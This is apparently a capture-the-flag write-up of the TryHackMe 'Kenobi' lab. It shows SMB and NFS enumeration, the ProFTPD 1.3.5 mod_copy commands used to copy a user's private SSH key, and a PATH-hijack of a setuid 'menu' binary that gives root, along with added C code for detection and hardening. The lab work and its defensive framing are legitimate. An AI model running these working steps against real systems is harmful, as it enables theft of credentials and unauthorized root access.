[Try Hack Me] Kenobi
nmap
┌──(kali㉿kali)-[~]
└─$ nmap -A -p- --min-rate 5000 $IP
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-27 20:45 JST
Warning: 10.10.141.231 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.141.231
Host is up (0.27s latency).
Not shown: 61337 closed tcp ports (conn-refused), 4187 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 32949/tcp6 mountd
| 100005 1,2,3 40406/udp mountd
| 100005 1,2,3 47898/udp6 mountd
| 100005 1,2,3 60663/tcp mountd
| 100021 1,3,4 35137/tcp nlockmgr
| 100021 1,3,4 36397/tcp6 nlockmgr
| 100021 1,3,4 44579/udp nlockmgr
| 100021 1,3,4 47545/udp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs 2-4 (RPC #100003)
35137/tcp open nlockmgr 1-4 (RPC #100021)
46547/tcp open mountd 1-3 (RPC #100005)
52885/tcp open mountd 1-3 (RPC #100005)
60663/tcp open mountd 1-3 (RPC #100005)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2024-01-27T11:46:19
|_ start_date: N/A
|_clock-skew: mean: 2h00m02s, deviation: 3h27m51s, median: 2s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: kenobi
| NetBIOS computer name: KENOBI\x00
| Domain name: \x00
| FQDN: kenobi
|_ System time: 2024-01-27T05:46:19-06:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.44 seconds
Scan the machine with nmap, how many ports are open?
7
Using the nmap command above, how many shares have been found?
enum4linux
┌──(kali㉿kali)-[~]
└─$ enum4linux -S $IP
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 27 20:54:15 2024
=========================================( Target Information )=========================================
Target ........... 10.10.141.231
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.10.141.231 )===========================
[+] Got domain/workgroup name: WORKGROUP
===================================( Session Check on 10.10.141.231 )===================================
[+] Server 10.10.141.231 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.141.231 )================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=================================( Share Enumeration on 10.10.141.231 )=================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP KENOBI
[+] Attempting to map shares on 10.10.141.231
//10.10.141.231/print$ Mapping: DENIED Listing: N/A Writing: N/A
//10.10.141.231/anonymous Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.141.231/IPC$ Mapping: N/A Listing: N/A Writing: N/A
enum4linux complete on Sat Jan 27 20:54:36 2024
nmap
Whether anonymous access is allowed is easier to read from the nmap output.
┌──(kali㉿kali)-[~]
└─$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.141.231
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-27 20:50 JST
Nmap scan report for 10.10.141.231
Host is up (0.27s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.141.231\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.141.231\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.141.231\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
3
Once you're connected, list the files on the share. What is the file can you see?
┌──(kali㉿kali)-[~]
└─$ smbclient //$IP/anonymous
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 19:49:09 2019
.. D 0 Wed Sep 4 19:56:07 2019
log.txt N 12237 Wed Sep 4 19:49:09 2019
9204224 blocks of size 1024. 6877108 blocks available
log.txt
What port is FTP running on?
21, from the nmap output.
Running the command given in the room did not download the file.
I investigated but could not find the cause, so I downloaded the txt file with smbclient instead.
┌──(kali㉿kali)-[~]
└─$ smbget -R smb://$IP/anonymous
handle_name_resolve_order: WARNING: Ignoring invalid list value 'smb://10.10.141.231/anonymous' for parameter 'name resolve order'
Downloaded 0b in 0 seconds
What mount can we see?
The following part of the nmap output is the table mapping RPC program numbers to port numbers.
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 32949/tcp6 mountd
| 100005 1,2,3 40406/udp mountd
| 100005 1,2,3 47898/udp6 mountd
| 100005 1,2,3 60663/tcp mountd
| 100021 1,3,4 35137/tcp nlockmgr
| 100021 1,3,4 36397/tcp6 nlockmgr
| 100021 1,3,4 44579/udp nlockmgr
| 100021 1,3,4 47545/udp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
┌──(kali㉿kali)-[~]
└─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.141.231
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-27 21:32 JST
Nmap scan report for 10.10.141.231
Host is up (0.27s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
Nmap done: 1 IP address (1 host up) scanned in 4.21 seconds
/var
What is the version?
1.3.5, from the nmap result.
How many exploits are there for the ProFTPd running?
┌──(kali㉿kali)-[~]
└─$ searchsploit proftpd -s 1.3.5
--------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
4
We're now going to copy Kenobi's private key using SITE CPFR and SITE CPTO commands.
From the room's explanation and the exploit-db code: the vulnerability is that specifying the file to copy with site cpfr and the destination with site cpto lets you retrieve the file.
Copy user kenobi's private key under /var, the directory exported over NFS.
┌──(kali㉿kali)-[~]
└─$ nc $IP 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.141.231]
site cpfr /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
site cpto /var/tmp/id_rsa
250 Copy successful
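From the defender's side, the exchange above is visible in the FTP server log. The following added example (not part of the room or ProFTPD) flags SITE CPFR / SITE CPTO commands issued by sessions that have not authenticated; it assumes an ExtendedLog with the Apache-style LogFormat "%h %l %u %t \"%r\" %s", where %u stays "-" until login, and the log lines are constructed.

```c
/* Added example, not from the room: flag SITE CPFR / SITE CPTO commands issued
 * by sessions that have not authenticated, from a ProFTPD ExtendedLog.
 * Assumed LogFormat: "%h %l %u %t \"%r\" %s"  (%u is "-" until login). */
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Constructed sample lines, not real server output. */
static const char *const sample_log[] = {
    "10.10.14.3 - - [27/Jan/2024:21:10:01 +0900] \"SITE CPFR /home/kenobi/.ssh/id_rsa\" 350",
    "10.10.14.3 - - [27/Jan/2024:21:10:02 +0900] \"site cpto /var/tmp/id_rsa\" 250",
    "10.10.14.9 - alice [27/Jan/2024:21:11:00 +0900] \"SITE CPFR notes.txt\" 350",
    "10.10.14.9 - alice [27/Jan/2024:21:11:01 +0900] \"RETR notes.txt\" 226",
    "10.10.14.3 - - [27/Jan/2024:21:12:00 +0900] \"USER kenobi\" 331",
};
#define SAMPLE_LOG_LEN (sizeof sample_log / sizeof sample_log[0])

/* Returns 1 when the line is a SITE CPFR/CPTO from an unauthenticated session
 * (FTP verbs are case-insensitive, so the comparison is too). */
int is_preauth_site_copy(const char *line) {
    char host[64], ident[64], user[64];
    if (sscanf(line, "%63s %63s %63s", host, ident, user) != 3) return 0;
    const char *cmd = strchr(line, '"');
    if (!cmd) return 0;
    cmd++;
    if (strncasecmp(cmd, "SITE CPFR", 9) != 0 && strncasecmp(cmd, "SITE CPTO", 9) != 0)
        return 0;
    return strcmp(user, "-") == 0;
}

/* Prints each hit and returns the number of flagged lines. */
int count_preauth_site_copy(const char *const *lines, int n) {
    int hits = 0;
    for (int i = 0; i < n; i++)
        if (is_preauth_site_copy(lines[i])) { hits++; printf("ALERT: %s\n", lines[i]); }
    return hits;
}

int main(void) {
    printf("%d pre-auth SITE copy command(s)\n",
           count_preauth_site_copy(sample_log, (int)SAMPLE_LOG_LEN));
    return 0;
}
```

Authenticated users issuing SITE CPFR on their own files are left alone; only the unauthenticated case that this version of mod_copy permitted is reported.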
Run the commands given in the room.
Mount /var on the attacking machine.
┌──(kali㉿kali)-[~]
└─$ sudo mkdir /mnt/kenobiNFS
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ sudo mount 10.10.141.231:/var /mnt/kenobiNFS
┌──(kali㉿kali)-[~]
└─$ ls -la /mnt/kenobiNFS
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 3 root root 4096 Jan 27 22:00 ..
drwxr-xr-x 2 root root 4096 Jan 27 21:25 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 13 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root _ssh 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 27 2019 mail
drwxr-xr-x 2 root root 4096 Feb 27 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 30 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Jan 27 21:53 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
┌──(kali㉿kali)-[~]
└─$ ls -la /mnt/kenobiNFS/tmp
total 28
drwxrwxrwt 6 root root 4096 Jan 27 21:53 .
drwxr-xr-x 14 root root 4096 Sep 4 2019 ..
-rw-r--r-- 1 kali kali 1675 Jan 27 21:53 id_rsa
drwx------ 3 root root 4096 Jan 27 20:41 systemd-private-1021f923dff64384af67fb2b6ec4c533-systemd-timesyncd.service-UMqH9s
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn
┌──(kali㉿kali)-[~]
└─$ cp /mnt/kenobiNFS/tmp/id_rsa .
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa kenobi@$IP
The authenticity of host '10.10.141.231 (10.10.141.231)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.141.231' (ED25519) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
kenobi@10.10.141.231's password:
┌──(kali㉿kali)-[~]
└─$ sudo chmod 600 id_rsa
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa kenobi@$IP
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ cat user.txt
What file looks particularly out of the ordinary?
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
Judging by the answer's character count, /usr/bin/menu.
Run the binary, how many options appear?
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
3
kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-`
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
Invalid choice
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7594
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
menu.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__isoc99_scanf@@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment
menu runs its commands without absolute paths.
Create a malicious file with the same name and put its directory on PATH so that menu executes it instead.
kenobi@kenobi:~$ echo /bin/sh > ifconfig
kenobi@kenobi:~$ pwd
/home/kenobi
kenobi@kenobi:~$ chmod 777 ifconfig
kenobi@kenobi:~$ export PATH=/home/kenobi:$PATH
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# ls
ifconfig share user.txt
# pwd
/home/kenobi
# cd /root
# ls
root.txt
# cat root.txt
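The root cause is the pattern the strings output suggests: setuid plus system() on bare command names. The following added example (a reconstruction, not the room's menu.c) shows that pattern beside a hardened version that uses absolute paths, no shell, and a fixed PATH in the child's environment; the command locations are assumed.

```c
/* Added example (reconstruction from the strings above, not the room's menu.c):
 * the vulnerable pattern beside a hardened version. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern: bare command names handed to system(), which runs
 * "/bin/sh -c <cmd>" and resolves the name through the caller's PATH.  With
 * setuid(0), a writable directory placed first in PATH runs any "ifconfig" as root. */
const char *vulnerable_command(int choice) {
    switch (choice) {
    case 1: return "curl -I localhost";
    case 2: return "uname -r";
    case 3: return "ifconfig";
    default: return NULL;
    }
}

/* Hardened: absolute paths (assumed locations), argv passed without a shell, and
 * a fixed trusted PATH in the child's environment so nothing it spawns is hijackable. */
static const char *const hardened_argv[3][4] = {
    {"/usr/bin/curl", "-I", "localhost", NULL},
    {"/bin/uname", "-r", NULL, NULL},
    {"/sbin/ifconfig", NULL, NULL, NULL},
};

const char *hardened_path(int choice) {
    return (choice >= 1 && choice <= 3) ? hardened_argv[choice - 1][0] : NULL;
}

int run_hardened(int choice) {
    if (!hardened_path(choice)) { puts("Invalid choice"); return -1; }
    pid_t pid = fork();
    if (pid == 0) {
        char *const env[] = {"PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL};
        execve(hardened_path(choice), (char *const *)hardened_argv[choice - 1], env);
        _exit(127);
    }
    int status;
    if (pid < 0 || waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
int main(void) {
    int choice = 0;
    printf("1. status check\n2. kernel version\n3. ifconfig\n** Enter your choice :");
    if (scanf("%d", &choice) != 1) return 1;
    return run_hardened(choice);
}
```

Even with these fixes, a setuid-root helper that exists only to run ifconfig is better replaced by a sudoers rule or capabilities than kept as a setuid binary.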